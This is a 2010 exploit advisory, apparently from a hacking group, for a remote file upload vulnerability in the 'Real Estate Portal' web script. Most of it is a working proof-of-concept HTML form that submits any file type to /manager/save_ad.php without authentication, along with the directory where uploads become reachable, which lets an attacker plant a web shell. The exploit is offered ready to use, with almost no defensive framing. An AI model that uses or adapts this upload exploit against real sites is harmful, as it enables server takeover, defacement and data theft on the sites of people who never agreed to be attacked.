realestateportal-shell.txt
Posted on 25 May 2010
______ _ _ _ | ___ | | | | (_) | |_/ /_____ _____ | |_ _| |_ _ ___ _ __ | // _ / / _ | | | | | __| |/ _ | '_ \n| | __/ V / (_) | | |_| | |_| | (_) | | | | \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| _____ _____ _____ |_ _| | _ || _ | | | ___ __ _ _ __ ___ | |/' || |_| | | |/ _ / _` | '_ ` _ | /| |\____ | | | __/ (_| | | | | | | |_/ /.___/ / \_/\___|\__,_|_| |_| |_| \___/ \____/ DEFACEMENT it's for script kiddies... _____________________________________________________________ [$] Exploit Title : Real Estate Portal Remote File Upload [$] Date : 24-05-2010 [$] Author : MasterGipy [$] Email : mastergipy [at] gmail.com [$] Bug : Remote File Upload [$] Script : http://hostnomi.net/detail.php?spid=44 [$] Demo : http://hostnomi.net/int/ [$] Google Dork : n/a [%] vulnerable file: /manager/save_ad.php [REMOTE UPLOAD VULNERABILITY] [$] Exploit: <html> Note: You can upload any filetype =P <form action="<!-- CHANGE HERE -->/manager/save_ad.php?id=" method="post" enctype="multipart/form-data" name="frmBanner"> <input type="file" name="image" class="inputt"><br> <input name="submit" type="submit" value=" Upload " > </form> <p>Files go to http://example.pt/ads/</p> <!-- Discovered by MasterGipy --> </html> [§] Greetings from PORTUGAL ^^
